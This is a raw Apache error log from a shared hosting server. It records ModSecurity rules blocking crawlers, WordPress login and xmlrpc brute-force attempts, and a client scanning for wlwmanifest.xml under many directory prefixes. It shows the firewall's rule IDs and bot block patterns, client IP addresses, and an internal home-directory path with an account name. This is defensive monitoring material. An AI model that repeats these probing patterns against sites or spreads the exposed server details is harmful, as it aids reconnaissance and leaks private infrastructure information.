[Tue May 26 17:56:41.559457 2026] [security2:error] [pid 946381:tid 946553] [client 85.208.96.193:14808] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-4-8/day/2023-06-13/"] [unique_id "ahWRgdiTu5WG4Dm5Wpr6eAAAACo"]
[Tue May 26 17:56:41.559654 2026] [security2:error] [pid 946381:tid 946553] [client 85.208.96.193:14808] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-4-8/day/2023-06-13/"] [unique_id "ahWRgdiTu5WG4Dm5Wpr6eAAAACo"]
[Tue May 26 17:56:42.378880 2026] [security2:error] [pid 946381:tid 946603] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRgdiTu5WG4Dm5Wpr6gQAAAFw"]
[Tue May 26 17:56:42.568986 2026] [security2:error] [pid 946381:tid 946397] [remote 216.73.216.30:28045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRgtiTu5WG4Dm5Wpr6lwAANA8"]
[Tue May 26 17:56:44.044572 2026] [security2:error] [pid 946381:tid 946560] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRg9iTu5WG4Dm5Wpr6uAAAADE"]
[Tue May 26 17:56:44.350664 2026] [security2:error] [pid 946381:tid 946401] [remote 41.111.171.131:45926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRhNiTu5WG4Dm5Wpr6wwAAQRM"]
[Tue May 26 17:56:47.195784 2026] [security2:error] [pid 946381:tid 946591] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRhtiTu5WG4Dm5Wpr7BQAAAFA"]
[Tue May 26 17:56:47.789990 2026] [core:crit] [pid 946381:tid 946631] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:56:48.922147 2026] [security2:error] [pid 946381:tid 946503] [remote 199.247.4.24:51480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRiNiTu5WG4Dm5Wpr7NwAAS3k"]
[Tue May 26 17:56:49.798900 2026] [security2:error] [pid 946381:tid 946423] [remote 174.138.83.43:47520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.83.138.174.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWRidiTu5WG4Dm5Wpr7TgAACik"]
[Tue May 26 17:56:49.944105 2026] [security2:error] [pid 946381:tid 946564] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRidiTu5WG4Dm5Wpr7TAAAADU"]
[Tue May 26 17:56:52.584132 2026] [security2:error] [pid 946381:tid 946424] [remote 216.73.216.30:11304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRjNiTu5WG4Dm5Wpr7jwAAMyo"]
[Tue May 26 17:56:52.628351 2026] [security2:error] [pid 946381:tid 946418] [remote 74.7.241.58:54406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWRjNiTu5WG4Dm5Wpr7lAAABCQ"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 17:56:53.070051 2026] [security2:error] [pid 946381:tid 946573] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRjNiTu5WG4Dm5Wpr7kgAAAD4"]
[Tue May 26 17:56:54.357292 2026] [security2:error] [pid 946381:tid 946539] [client 85.204.70.118:33660] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "panda-eco.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWRjtiTu5WG4Dm5Wpr7zwAAABw"]
[Tue May 26 17:56:55.118346 2026] [security2:error] [pid 946381:tid 946618] [client 85.204.70.118:33664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "panda-eco.com"] [uri "/xmlrpc.php"] [unique_id "ahWRjtiTu5WG4Dm5Wpr72QAAAGs"]
[Tue May 26 17:56:55.482338 2026] [security2:error] [pid 946381:tid 946526] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRj9iTu5WG4Dm5Wpr74AAAAA8"]
[Tue May 26 17:56:56.839426 2026] [security2:error] [pid 946381:tid 946633] [client 85.204.70.118:33674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "panda-eco.com"] [uri "/xmlrpc.php"] [unique_id "ahWRkNiTu5WG4Dm5Wpr8HQAAAHo"]
[Tue May 26 17:56:56.839525 2026] [security2:error] [pid 946381:tid 946633] [client 85.204.70.118:33674] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "panda-eco.com"] [uri "/xmlrpc.php"] [unique_id "ahWRkNiTu5WG4Dm5Wpr8HQAAAHo"]
[Tue May 26 17:56:57.547742 2026] [security2:error] [pid 946381:tid 946630] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRkdiTu5WG4Dm5Wpr8IAAAAHc"]
[Tue May 26 17:56:59.646409 2026] [security2:error] [pid 946381:tid 946596] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRk9iTu5WG4Dm5Wpr8UgAAAFU"]
[Tue May 26 17:56:59.801043 2026] [security2:error] [pid 946381:tid 946444] [remote 20.219.17.202:60270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWRk9iTu5WG4Dm5Wpr8WwAASj4"]
[Tue May 26 17:57:00.241669 2026] [security2:error] [pid 946381:tid 946454] [remote 216.73.216.30:9134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRlNiTu5WG4Dm5Wpr8ZgAAaUg"]
[Tue May 26 17:57:02.940471 2026] [security2:error] [pid 946381:tid 946487] [remote 167.172.25.98:51106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRltiTu5WG4Dm5Wpr8jQAAeWk"]
[Tue May 26 17:57:03.027675 2026] [security2:error] [pid 946381:tid 946514] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRltiTu5WG4Dm5Wpr8jAAAAAM"]
[Tue May 26 17:57:05.327543 2026] [security2:error] [pid 946381:tid 946528] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRmNiTu5WG4Dm5Wpr8twAAABE"]
[Tue May 26 17:57:05.373131 2026] [security2:error] [pid 946381:tid 946511] [client 113.179.96.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRmNiTu5WG4Dm5Wpr8ugAAAAA"]
[Tue May 26 17:57:08.257867 2026] [security2:error] [pid 946381:tid 946525] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRm9iTu5WG4Dm5Wpr9BAAAAA4"]
[Tue May 26 17:57:10.713083 2026] [security2:error] [pid 946381:tid 946547] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRntiTu5WG4Dm5Wpr9OwAAACQ"]
[Tue May 26 17:57:11.099849 2026] [security2:error] [pid 946381:tid 946553] [client 91.142.73.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWRntiTu5WG4Dm5Wpr9TgAAACo"], referer: http://bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:57:11.574940 2026] [fcgid:warn] [pid 946381:tid 946630] (70014)End of file found: [client 66.132.172.44:58210] mod_fcgid: can't get data from http client
[Tue May 26 17:57:12.254908 2026] [security2:error] [pid 946381:tid 946597] [client 114.119.140.73:21071] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/2-libreria-"] [unique_id "ahWRoNiTu5WG4Dm5Wpr9bgAAAFY"], referer: http://politica-global.com/
[Tue May 26 17:57:12.686689 2026] [security2:error] [pid 946381:tid 946521] [client 91.142.73.116:59629] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "91.142.73.116" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWRoNiTu5WG4Dm5Wpr9eAAAAAo"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:57:12.883832 2026] [security2:error] [pid 946381:tid 946521] [client 91.142.73.116:59629] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWRoNiTu5WG4Dm5Wpr9eAAAAAo"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:57:13.229105 2026] [security2:error] [pid 946381:tid 946522] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRoNiTu5WG4Dm5Wpr9ewAAAAs"]
[Tue May 26 17:57:14.017658 2026] [security2:error] [pid 946381:tid 946588] [client 202.28.194.139:56801] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "202.28.194.139" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWRotiTu5WG4Dm5Wpr9kgAAAE0"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:57:14.017768 2026] [security2:error] [pid 946381:tid 946588] [client 202.28.194.139:56801] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWRotiTu5WG4Dm5Wpr9kgAAAE0"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:57:14.373359 2026] [security2:error] [pid 946381:tid 946491] [remote 222.165.190.235:36994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWRotiTu5WG4Dm5Wpr9mQAAbG0"]
[Tue May 26 17:57:15.344547 2026] [security2:error] [pid 946381:tid 946606] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRotiTu5WG4Dm5Wpr9qAAAAF8"]
[Tue May 26 17:57:18.550227 2026] [security2:error] [pid 946381:tid 946548] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRptiTu5WG4Dm5Wpr97AAAACU"]
[Tue May 26 17:57:20.265202 2026] [security2:error] [pid 946381:tid 946598] [client 168.144.101.237:63862] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWRqNiTu5WG4Dm5Wpr-IwAAAFc"]
[Tue May 26 17:57:21.079401 2026] [security2:error] [pid 946381:tid 946560] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRqNiTu5WG4Dm5Wpr-TwAAADE"]
[Tue May 26 17:57:21.122638 2026] [security2:error] [pid 946381:tid 946536] [client 168.144.101.237:65067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.101.144.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jkjuice.com"] [uri "/xmlrpc.php"] [unique_id "ahWRqNiTu5WG4Dm5Wpr-VgAAABk"]
[Tue May 26 17:57:21.728293 2026] [security2:error] [pid 946381:tid 946558] [client 168.144.101.237:65415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWRqdiTu5WG4Dm5Wpr-gQAAAC8"]
[Tue May 26 17:57:22.358524 2026] [security2:error] [pid 946381:tid 946530] [client 168.144.101.237:49220] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWRqtiTu5WG4Dm5Wpr-pgAAABM"]
[Tue May 26 17:57:22.983770 2026] [security2:error] [pid 946381:tid 946516] [client 168.144.101.237:49407] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWRqtiTu5WG4Dm5Wpr-1QAAAAU"]
[Tue May 26 17:57:23.255094 2026] [security2:error] [pid 946381:tid 946396] [remote 195.250.23.247:59666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRq9iTu5WG4Dm5Wpr-2QAATA4"]
[Tue May 26 17:57:23.257367 2026] [security2:error] [pid 946381:tid 946557] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRqtiTu5WG4Dm5Wpr-zgAAAC4"]
[Tue May 26 17:57:23.610565 2026] [security2:error] [pid 946381:tid 946521] [client 168.144.101.237:49553] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWRq9iTu5WG4Dm5Wpr-5wAAAAo"]
[Tue May 26 17:57:24.225913 2026] [security2:error] [pid 946381:tid 946544] [client 168.144.101.237:49730] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWRrNiTu5WG4Dm5Wpr-_gAAACE"]
[Tue May 26 17:57:24.871795 2026] [security2:error] [pid 946381:tid 946590] [client 168.144.101.237:49958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWRrNiTu5WG4Dm5Wpr_EAAAAE8"]
[Tue May 26 17:57:25.493294 2026] [security2:error] [pid 946381:tid 946638] [client 168.144.101.237:50222] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWRrdiTu5WG4Dm5Wpr_JwAAAH8"]
[Tue May 26 17:57:26.114574 2026] [security2:error] [pid 946381:tid 946570] [client 168.144.101.237:50556] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWRrtiTu5WG4Dm5Wpr_PQAAADs"]
[Tue May 26 17:57:26.188076 2026] [security2:error] [pid 946381:tid 946603] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRrdiTu5WG4Dm5Wpr_MQAAAFw"]
[Tue May 26 17:57:26.781035 2026] [security2:error] [pid 946381:tid 946554] [client 51.75.236.136:48150] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "kineticinfraprojects.com"] [uri "/robots.txt"] [unique_id "ahWRrtiTu5WG4Dm5Wpr_TwAAACs"]
[Tue May 26 17:57:26.781118 2026] [security2:error] [pid 946381:tid 946554] [client 51.75.236.136:48150] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "kineticinfraprojects.com"] [uri "/robots.txt"] [unique_id "ahWRrtiTu5WG4Dm5Wpr_TwAAACs"]
[Tue May 26 17:57:27.635884 2026] [security2:error] [pid 946381:tid 946420] [remote 38.95.35.74:56072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRr9iTu5WG4Dm5Wpr_WwAATyY"]
[Tue May 26 17:57:27.875868 2026] [security2:error] [pid 946381:tid 946427] [remote 38.95.35.74:56072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRr9iTu5WG4Dm5Wpr_YgAAbS0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:57:27.897757 2026] [security2:error] [pid 946381:tid 946508] [remote 216.73.216.30:30050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRr9iTu5WG4Dm5Wpr_aQAAen4"]
[Tue May 26 17:57:28.122908 2026] [security2:error] [pid 946381:tid 946557] [client 54.39.89.57:26408] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "kineticinfraprojects.com"] [uri "/"] [unique_id "ahWRsNiTu5WG4Dm5Wpr_agAAAC4"]
[Tue May 26 17:57:28.123043 2026] [security2:error] [pid 946381:tid 946557] [client 54.39.89.57:26408] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "kineticinfraprojects.com"] [uri "/"] [unique_id "ahWRsNiTu5WG4Dm5Wpr_agAAAC4"]
[Tue May 26 17:57:28.336578 2026] [security2:error] [pid 946381:tid 946540] [client 168.144.101.237:51831] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWRsNiTu5WG4Dm5Wpr_cQAAAB0"]
